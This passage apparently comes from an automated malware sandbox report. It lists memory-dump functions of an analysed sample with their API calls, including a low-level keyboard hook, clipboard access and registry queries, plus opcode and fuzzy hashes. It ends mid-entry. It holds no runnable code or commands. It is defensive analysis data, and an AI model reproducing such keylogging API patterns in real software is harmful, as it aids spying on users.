                                                      • Instruction ID: 3ddf07dc633bd2c10c67c0d19a3bbb661a1f5ee38e2904b417126fd3f859fb16
                                                      • Opcode Fuzzy Hash: 415971300a12689201828e8d1d21c1d3328cc480327ec65d1cc1df1749ae05a7
                                                      • Instruction Fuzzy Hash: 6E416BB4A003558FCB00CF89C488BAABBF5FF99318F248459E459AB321D734E841CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06380744, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 06380809
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924334917.0000000006380000.00000040.00000001.sdmp, Offset: 06380000, based on PE: false
                                                      Similarity
                                                      • API ID: QueryValue
                                                      • String ID:
                                                      • API String ID: 3660427363-0
                                                      • Opcode ID: e899d7d1accc95365c66d48c2772ae918b9ce72a3a4c23d05b59000d7a4221be
                                                      • Instruction ID: 948b0990b0bb20c06edb9f75b5d8a079c060d9e550c8e4740ae9dd42bc9e6b5e
                                                      • Opcode Fuzzy Hash: e899d7d1accc95365c66d48c2772ae918b9ce72a3a4c23d05b59000d7a4221be
                                                      • Instruction Fuzzy Hash: EF41CEB5D00258DFCB14DFA9C984ADEBBF5AF48714F24806AE819AB310D7749949CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06380750, Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 06380809
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924334917.0000000006380000.00000040.00000001.sdmp, Offset: 06380000, based on PE: false
                                                      Similarity
                                                      • API ID: QueryValue
                                                      • String ID:
                                                      • API String ID: 3660427363-0
                                                      • Opcode ID: a6768462f8cf98a9d78c152ac86a0026d7c762fdec6810d96915d997a5857905
                                                      • Instruction ID: 098e142f4651c3b179abd889c3429d7dd1ad18222668eedc9882e4894e8e44dd
                                                      • Opcode Fuzzy Hash: a6768462f8cf98a9d78c152ac86a0026d7c762fdec6810d96915d997a5857905
                                                      • Instruction Fuzzy Hash: 6031CFB5D00258DFCB14DF9AC984ACEBBF5AB48714F14806AE819AB310D774A949CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06388450, Relevance: 1.6, APIs: 1, Instructions: 85libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924334917.0000000006380000.00000040.00000001.sdmp, Offset: 06380000, based on PE: false
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0e48c4a78acf691e2ddfcad4c34087aa9cfbef0563c6bdeffab50dc0c372f510
                                                      • Instruction ID: a8375863915a757f73224a6978f5fdbd1b59c05dfc4620663dca258a3e755226
                                                      • Opcode Fuzzy Hash: 0e48c4a78acf691e2ddfcad4c34087aa9cfbef0563c6bdeffab50dc0c372f510
                                                      • Instruction Fuzzy Hash: 6431CE30E11385DFDB59EBA8D44469D7AB6EB95304F64882AE001DB384DB319A45CFD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0638050F, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 063805CC
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924334917.0000000006380000.00000040.00000001.sdmp, Offset: 06380000, based on PE: false
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID:
                                                      • API String ID: 71445658-0
                                                      • Opcode ID: a7c42d037f8d5eca4e7f8a34beac86d9cd98b90f8b0559bc315150542268f4a2
                                                      • Instruction ID: 6924ca37791f92c00693f98325741c617b6b73692b9fde958104d5195e78722c
                                                      • Opcode Fuzzy Hash: a7c42d037f8d5eca4e7f8a34beac86d9cd98b90f8b0559bc315150542268f4a2
                                                      • Instruction Fuzzy Hash: FE31ECB5D013499FDB14CFA8C584ACEFBF5AF48314F28856AE409AB340D7759989CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06380518, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 063805CC
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924334917.0000000006380000.00000040.00000001.sdmp, Offset: 06380000, based on PE: false
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID:
                                                      • API String ID: 71445658-0
                                                      • Opcode ID: 336b7e16f30859bdfa0d49732a1a0e93ca63a37ac8c31c03ca2ef6cdc3106288
                                                      • Instruction ID: 8a8d6fb896ea38bda49793f44bf2f03ebd772b285112c5f87651b98db7dd0fe8
                                                      • Opcode Fuzzy Hash: 336b7e16f30859bdfa0d49732a1a0e93ca63a37ac8c31c03ca2ef6cdc3106288
                                                      • Instruction Fuzzy Hash: 1D31DFB1D013499FDB14CF99C584ACEFBF5BB48314F28816AE409AB350C7759989CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06430229, Relevance: 1.6, APIs: 1, Instructions: 78comclipboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924641329.0000000006430000.00000040.00000001.sdmp, Offset: 06430000, based on PE: false
                                                      Similarity
                                                      • API ID: Clipboard
                                                      • String ID:
                                                      • API String ID: 220874293-0
                                                      • Opcode ID: 93494ad17a7bf06fe770be405c4714cc35c8f5302628bdafea57b2adb8d10993
                                                      • Instruction ID: 0db23a4b955a0c3361f1f101317ff86c2df0d1480e10171f2e3ee34823f44822
                                                      • Opcode Fuzzy Hash: 93494ad17a7bf06fe770be405c4714cc35c8f5302628bdafea57b2adb8d10993
                                                      • Instruction Fuzzy Hash: EA3100B0D01258DFDB10CF99C885BCEBBB1EB48314F24806AE408BB790DB746946CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0643BAA8, Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924641329.0000000006430000.00000040.00000001.sdmp, Offset: 06430000, based on PE: false
                                                      Similarity
                                                      • API ID: Clipboard
                                                      • String ID:
                                                      • API String ID: 220874293-0
                                                      • Opcode ID: 60a88f08af7947ee88de1e783421ad5707a176961260fb61457cae11786e2980
                                                      • Instruction ID: d615d38cb2d2df3932d5d244fdab335bf1918a7314f5d451154930bc57928c24
                                                      • Opcode Fuzzy Hash: 60a88f08af7947ee88de1e783421ad5707a176961260fb61457cae11786e2980
                                                      • Instruction Fuzzy Hash: A531D0B0D01258DFDB54CF99C885BCEBBB5AB48318F24805AE408BB794DB746945CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D25562, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04D255EF
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.918111394.0000000004D20000.00000040.00000001.sdmp, Offset: 04D20000, based on PE: false
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 3e9a5129e80035bfcf412b192312bb3615ecb0383852c6c56c4cc173493046ca
                                                      • Instruction ID: 1fce9bec26a20a57212599bc79fb595e0c000074a6f7e609bac2882480492d66
                                                      • Opcode Fuzzy Hash: 3e9a5129e80035bfcf412b192312bb3615ecb0383852c6c56c4cc173493046ca
                                                      • Instruction Fuzzy Hash: 8D2112B5900208AFDF00CFA9D584ADEBBF4FB48324F14801AE818B3710D378AA45CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D2A748, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlEncodePointer.NTDLL(00000000), ref: 04D2A7D2
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.918111394.0000000004D20000.00000040.00000001.sdmp, Offset: 04D20000, based on PE: false
                                                      Similarity
                                                      • API ID: EncodePointer
                                                      • String ID:
                                                      • API String ID: 2118026453-0
                                                      • Opcode ID: f6e5c7fa636c0f08b6c1e70b772a0ff8b8b090575d55a986a41ac83a8a33ea73
                                                      • Instruction ID: 2850a8c51420b696389b866ebce787c233d8b71bde73a4bf30eee51a98072db0
                                                      • Opcode Fuzzy Hash: f6e5c7fa636c0f08b6c1e70b772a0ff8b8b090575d55a986a41ac83a8a33ea73
                                                      • Instruction Fuzzy Hash: 2D21CD759003958FDB10DFA5C60539EBBF8FB55318F04806AD445E3701C738A505CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D25568, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04D255EF
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.918111394.0000000004D20000.00000040.00000001.sdmp, Offset: 04D20000, based on PE: false
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 826457e561f4815bece4bfc9ab3614b8402d38ddb09ea0c6270b78b947ef7244
                                                      • Instruction ID: 4bd9c58250e5522086b5632254f1d59ead73ac88a7a3d3d94a0657c134ce6626
                                                      • Opcode Fuzzy Hash: 826457e561f4815bece4bfc9ab3614b8402d38ddb09ea0c6270b78b947ef7244
                                                      • Instruction Fuzzy Hash: 1721F5B5900209AFDF10CF99D584ADEBBF4FB48324F14801AE918B3710D378A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0643AF7F, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,0643AF77), ref: 0643B007
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924641329.0000000006430000.00000040.00000001.sdmp, Offset: 06430000, based on PE: false
                                                      Similarity
                                                      • API ID: CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2492992576-0
                                                      • Opcode ID: 80655a9d947a8b6abff59a6dfd51bfbef96279ebdb052fd2021449094c0621f7
                                                      • Instruction ID: d9f59cda27d95462e2be427d172eb606de09af13cdbdf483668323c2db31e6d7
                                                      • Opcode Fuzzy Hash: 80655a9d947a8b6abff59a6dfd51bfbef96279ebdb052fd2021449094c0621f7
                                                      • Instruction Fuzzy Hash: 282189B58043488FCB11CFA9C4857DEBBF4AF09324F24845AD469A7751D778A849CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0643D2F8, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 0643D37B
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924641329.0000000006430000.00000040.00000001.sdmp, Offset: 06430000, based on PE: false
                                                      Similarity
                                                      • API ID: HookWindows
                                                      • String ID:
                                                      • API String ID: 2559412058-0
                                                      • Opcode ID: c7d478bba84daf7da897d3219b43b8abf88d806ae996721868537c9969549caf
                                                      • Instruction ID: d1364073b0897767d485ece607c276363c33fa843428ef6180b60689c1f211fe
                                                      • Opcode Fuzzy Hash: c7d478bba84daf7da897d3219b43b8abf88d806ae996721868537c9969549caf
                                                      • Instruction Fuzzy Hash: 022135B1D002099FCB54CFA9D845BEEBBF5AF88324F14841AD459A7750CB78A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06436019, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,06435F9A), ref: 06436087
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924641329.0000000006430000.00000040.00000001.sdmp, Offset: 06430000, based on PE: false
                                                      Similarity
                                                      • API ID: GlobalMemoryStatus
                                                      • String ID:
                                                      • API String ID: 1890195054-0
                                                      • Opcode ID: b2080c5bc83733d92e3b32258d35836fe4ce35ed847a3536b84b17eac3d96f16
                                                      • Instruction ID: e01e5d07594e72167544a79667f2d57cf773dd11ff0398f5a9c95ebd1107358f
                                                      • Opcode Fuzzy Hash: b2080c5bc83733d92e3b32258d35836fe4ce35ed847a3536b84b17eac3d96f16
                                                      • Instruction Fuzzy Hash: EB1106B1C006599BCB10CF9AC445BDEFBB4AB48224F15816AE458B7740D778A945CFE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06435B38, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,06435F9A), ref: 06436087
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924641329.0000000006430000.00000040.00000001.sdmp, Offset: 06430000, based on PE: false
                                                      Similarity
                                                      • API ID: GlobalMemoryStatus
                                                      • String ID:
                                                      • API String ID: 1890195054-0
                                                      • Opcode ID: d522b38a1b8fd19b22365c26bc2f3092d4e482866bf85e5e7d5cfb7788740d83
                                                      • Instruction ID: 43b60721b84046c8f28d939263a50efcd28e3f18f3e1ed9cfb7dba68b3945ee6
                                                      • Opcode Fuzzy Hash: d522b38a1b8fd19b22365c26bc2f3092d4e482866bf85e5e7d5cfb7788740d83
                                                      • Instruction Fuzzy Hash: 7E1103B1C0062A9BCB10DF9AC445BEEFBF4AB48224F15816AD818B7740D778A944CFE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D2A758, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlEncodePointer.NTDLL(00000000), ref: 04D2A7D2
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.918111394.0000000004D20000.00000040.00000001.sdmp, Offset: 04D20000, based on PE: false
                                                      Similarity
                                                      • API ID: EncodePointer
                                                      • String ID:
                                                      • API String ID: 2118026453-0
                                                      • Opcode ID: b4acbf644c122fd813fe5eb0461c3c8285b214533f87e4a5b246ff9d4d57dd33
                                                      • Instruction ID: ce92bbfad47d7871e5fa85abfafb52db29ed3d8d3230c5920dec2306d263177a
                                                      • Opcode Fuzzy Hash: b4acbf644c122fd813fe5eb0461c3c8285b214533f87e4a5b246ff9d4d57dd33
                                                      • Instruction Fuzzy Hash: 951189749003498FDF20DFA9C64879EBBF8FB48318F10846AD449E3701D739A9048FA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0643A6EC, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,0643AF77), ref: 0643B007
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924641329.0000000006430000.00000040.00000001.sdmp, Offset: 06430000, based on PE: false
                                                      Similarity
                                                      • API ID: CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2492992576-0
                                                      • Opcode ID: a9067f14d9b3c1c85447dba1db706eb4515f368beb0a39b7adbde0e048482d3b
                                                      • Instruction ID: 2d0b0f1ca2d9d52007d6d811f1a9ca048fb4333fd63b3200c45151ff383c0925
                                                      • Opcode Fuzzy Hash: a9067f14d9b3c1c85447dba1db706eb4515f368beb0a39b7adbde0e048482d3b
                                                      • Instruction Fuzzy Hash: F91133B59002488FCB10DF9AD489BDEFBF4EB48324F24845AD469B7750C778A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0643B552, Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 0643B5AD
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924641329.0000000006430000.00000040.00000001.sdmp, Offset: 06430000, based on PE: false
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID:
                                                      • API String ID: 2538663250-0
                                                      • Opcode ID: dedcb1f601a11617fb5f5b056053f91be951c601317f88bd3247ff18c992acbc
                                                      • Instruction ID: 9b61bdeee07cc9d5ef8ecb876dc0c79723be94315be3d8b3a10e4f3c4fd4a531
                                                      • Opcode Fuzzy Hash: dedcb1f601a11617fb5f5b056053f91be951c601317f88bd3247ff18c992acbc
                                                      • Instruction Fuzzy Hash: 4B1115B58002188FCB10DF99D485BDEBBF4EB48324F24855AE459B7700D378A644CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0643A994, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 0643B5AD
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924641329.0000000006430000.00000040.00000001.sdmp, Offset: 06430000, based on PE: false
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID:
                                                      • API String ID: 2538663250-0
                                                      • Opcode ID: 84b4941d18e4b8727a05263698691b3eb59e90f277e4c6986cd40246e3b630da
                                                      • Instruction ID: 8a544658260752792c310a24e5ecbdf02a7c05957c24248ec94480b8775bb8bb
                                                      • Opcode Fuzzy Hash: 84b4941d18e4b8727a05263698691b3eb59e90f277e4c6986cd40246e3b630da
                                                      • Instruction Fuzzy Hash: 4B1115B59003488FCB50DF99D485BDEBBF4EB48324F20845AD519B7700C378A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3BA08, Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \Ak
                                                      • API String ID: 0-1678284976
                                                      • Opcode ID: fbf621e6ebd39819483b5106bb0e186542eafb2686139094244a2f86b0d5ab1c
                                                      • Instruction ID: 40645970a71b9660337ce97032bfc83cbf3a22afc1d4d028a00405c67713c4b0
                                                      • Opcode Fuzzy Hash: fbf621e6ebd39819483b5106bb0e186542eafb2686139094244a2f86b0d5ab1c
                                                      • Instruction Fuzzy Hash: EC51D131B042188BEB14DB78D8913AD76F7AB89355F14802BE449EB384DF749C4587A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3D978, Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GY+
                                                      • API String ID: 0-3999011982
                                                      • Opcode ID: 7650610b8fe618aa1af020b1de95e0ae89a8da2edb25891f861f258b48f63414
                                                      • Instruction ID: d0d45b166da767cb074c2327c90154a9cc8287a27579d74d44e9d42349d87333
                                                      • Opcode Fuzzy Hash: 7650610b8fe618aa1af020b1de95e0ae89a8da2edb25891f861f258b48f63414
                                                      • Instruction Fuzzy Hash: 47314174E1060BDFCB44EFA9E9454ADBBB2FF89344F10886AD105A7364EB746A06CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3D988, Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GY+
                                                      • API String ID: 0-3999011982
                                                      • Opcode ID: 26c56f1ec0176b3f343c3a8a06fcff90b083c25519396722adbea63c546647c6
                                                      • Instruction ID: d05ebaad0a5e6b34d154737b3863bd2f0203dced3b66e1e00f8bfb53be3b0da4
                                                      • Opcode Fuzzy Hash: 26c56f1ec0176b3f343c3a8a06fcff90b083c25519396722adbea63c546647c6
                                                      • Instruction Fuzzy Hash: 77213574E1050EDFCB44EFA9D9824ADBBB2FF85344F50882AD515A7354EB346A068F90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3008A, Relevance: .3, Instructions: 269COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d170a9fefe6ebdfd3e888048ea354326b584f49e51092a89f3069f020ef86978
                                                      • Instruction ID: d83c3c839ab4f86e723e2199b9cb8c9e311813ad2df377323df0526770c80a6b
                                                      • Opcode Fuzzy Hash: d170a9fefe6ebdfd3e888048ea354326b584f49e51092a89f3069f020ef86978
                                                      • Instruction Fuzzy Hash: ECC12A34A01209DFCB24DFA9C989EAEBBF2BF48314F15855AE845EB661D730E940CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D30E20, Relevance: .2, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 470df632b8ab87ac4304ca0160ffc2d5089dd32a15adf6145e31dd59d47770ae
                                                      • Instruction ID: 49cd78f081cb018dd6ac1dc02843586e0811026fdd88fd5c4395055ffc7a6b7e
                                                      • Opcode Fuzzy Hash: 470df632b8ab87ac4304ca0160ffc2d5089dd32a15adf6145e31dd59d47770ae
                                                      • Instruction Fuzzy Hash: 5C61AB313081468FCB14DF79D889E2A7BEABF4965470544ABF906CB361EB35DD41CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D390AB, Relevance: .2, Instructions: 165COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 968d09f38d36ba2d14d78c0eae6e7769f6154145e2e4fbba367ae3076a3e8afd
                                                      • Instruction ID: f66626f1ac58acc5408070a60c42e3809a8cd886fd66c1a1afc8105762e7cde9
                                                      • Opcode Fuzzy Hash: 968d09f38d36ba2d14d78c0eae6e7769f6154145e2e4fbba367ae3076a3e8afd
                                                      • Instruction Fuzzy Hash: 37712F74F016048FCB80EFB5E49159EB7B6EF88318F20466AD509AB768DB346D05CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3B630, Relevance: .2, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eebf93a4224cb325b971a091f16a066ccfa9197c8d14d14245ccd0e6b64f6de0
                                                      • Instruction ID: 6505bcdb6d9455447dc311f92b69723ad437a199d62bc99b60a08355ea4e3e46
                                                      • Opcode Fuzzy Hash: eebf93a4224cb325b971a091f16a066ccfa9197c8d14d14245ccd0e6b64f6de0
                                                      • Instruction Fuzzy Hash: D251F071B006148FEB10DB78C856B6DBAE2EF89314F25817AD5599F3E2DB34DC028791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D390B8, Relevance: .2, Instructions: 158COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 94e77481740d1aca748bd602362f3e5dea4610555691ef6e0502ae0705b75d93
                                                      • Instruction ID: 0db19f6ec97f4d90d0208fe155748ca0fcd624b78842d448114623d636ece3b2
                                                      • Opcode Fuzzy Hash: 94e77481740d1aca748bd602362f3e5dea4610555691ef6e0502ae0705b75d93
                                                      • Instruction Fuzzy Hash: 2F612C74B01608CFDB80EFB5E49159EB7B6EF88318F204669D509AB768DB346D05CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3873B, Relevance: .1, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 59235cd511a85bd66e0c593293d947b158f902ac8a4f10bc29bcff97d2666812
                                                      • Instruction ID: 94dcc0a1b1bb146c784b69246485e56ea84bb59b74f05555e4ccb9db1830cd53
                                                      • Opcode Fuzzy Hash: 59235cd511a85bd66e0c593293d947b158f902ac8a4f10bc29bcff97d2666812
                                                      • Instruction Fuzzy Hash: A84114B1B011059BCB04DB78ED425BFBBB7AFC4258B10482BE106EB291DF34DE0597A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3B9F9, Relevance: .1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 09db9f95b8a51a7c32c90554359457da97f6c231e05ba6881d0fc21a68e71caa
                                                      • Instruction ID: 534fb8ef60c6a62c7b764fa870c2eeef94d121e4769b4b89e545d030d695f997
                                                      • Opcode Fuzzy Hash: 09db9f95b8a51a7c32c90554359457da97f6c231e05ba6881d0fc21a68e71caa
                                                      • Instruction Fuzzy Hash: 1941C230B042089FEB14DBB8D4957ADB7F2EB89315F14842BE449EB380DFB59C458B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D38748, Relevance: .1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 39249710ed34fbe7c3aff82e0aaddf48da255804c5a1e81573b6ca4e2ed66699
                                                      • Instruction ID: 2a909df084e83cbdfac310609412f6b76e925d9e333c90533af927004a00b520
                                                      • Opcode Fuzzy Hash: 39249710ed34fbe7c3aff82e0aaddf48da255804c5a1e81573b6ca4e2ed66699
                                                      • Instruction Fuzzy Hash: 3F41E4B1B051068BCB04DB78ED425AFBBB7ABC4258F10482BE106EB295DF34DD0597A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D32C41, Relevance: .1, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ac9de6778703622636496b63fa69ac08b6cea41de8d42447650d7fa77990515d
                                                      • Instruction ID: 5ab69369cf306bad8fcc9b939171dd120997ebe477688ba8ef973ea3657ab357
                                                      • Opcode Fuzzy Hash: ac9de6778703622636496b63fa69ac08b6cea41de8d42447650d7fa77990515d
                                                      • Instruction Fuzzy Hash: 1941D0397042059FDB15DF24E865B6A3BB2FB88355F04806AF90ACB3A1CB34DC11C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D39470, Relevance: .1, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15683a8d9a0272e63340cf8f5bd8a56323af65aabb86e41ebf663af6dd8d3ca6
                                                      • Instruction ID: f32930661c2dabb301c11321d200bd58d9dfe816c7df74e8b34be62a69afb436
                                                      • Opcode Fuzzy Hash: 15683a8d9a0272e63340cf8f5bd8a56323af65aabb86e41ebf663af6dd8d3ca6
                                                      • Instruction Fuzzy Hash: 1541E131B041049FDB54DF78D4626BFB7A3AB89258B10883AD006EB395DF78DD428BE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D30C10, Relevance: .1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9d2f0b308477a8398f68b9e957b82a9ad0d71582030c0b6730ffae50c48cf531
